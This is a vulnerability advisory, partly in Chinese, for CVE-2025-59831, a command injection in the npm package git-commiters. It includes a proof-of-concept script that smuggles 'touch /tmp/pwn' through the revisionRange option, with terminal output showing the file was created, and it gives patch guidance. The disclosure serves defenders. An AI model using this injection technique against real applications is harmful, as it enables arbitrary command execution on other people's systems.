CVE-2025-59831
`git-comiters` Command Injection vulnerability
描述
## Background on the vulnerability This vulnerability manifests with the library's primary exported API: `gitCommiters(options, callback)` which allows specifying options such as `cwd` for current working directory and `revisionRange` as a revision pointer, such as `HEAD`. However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution. ## Exploit 1. Install `[email protected]` or earlier 2. Initiaizlie a new Git directory with commits in it 3. Create the following script in that directory: ```js var gitCommiters = require("git-commiters"); var options = { cwd: "./", revisionRange: "HEAD; touch /tmp/pwn; #", }; gitCommiters(options, function (err, result) { if (err) console.log(err); else console.log(result); }); ``` 3. Observe new file created on disk at `/tmp/pwn` The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application. ```sh @lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js [ { email: '[email protected]', name: 'Morton Fox', deletions: 1, insertions: 1, commits: 1 }, { email: '[email protected]', name: 'Riceball LEE', deletions: 11, insertions: 1198, commits: 7 } ] @lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn -rw-r--rw- 1 codespace codespace 0 Jul 1 06:09 /tmp/pwn ``` # Credit Liran Tal
如何修補 CVE-2025-59831
要修補 CVE-2025-59831,請將受影響套件升級到下列已修補版本。
- —升級至 0.1.2 或更新版本
CVE-2025-59831 正在被利用嗎?
低 — EPSS 為 0.1%,目前沒有觀察到大規模利用活動。
受影響套件(1)
- from 0, < 0.1.2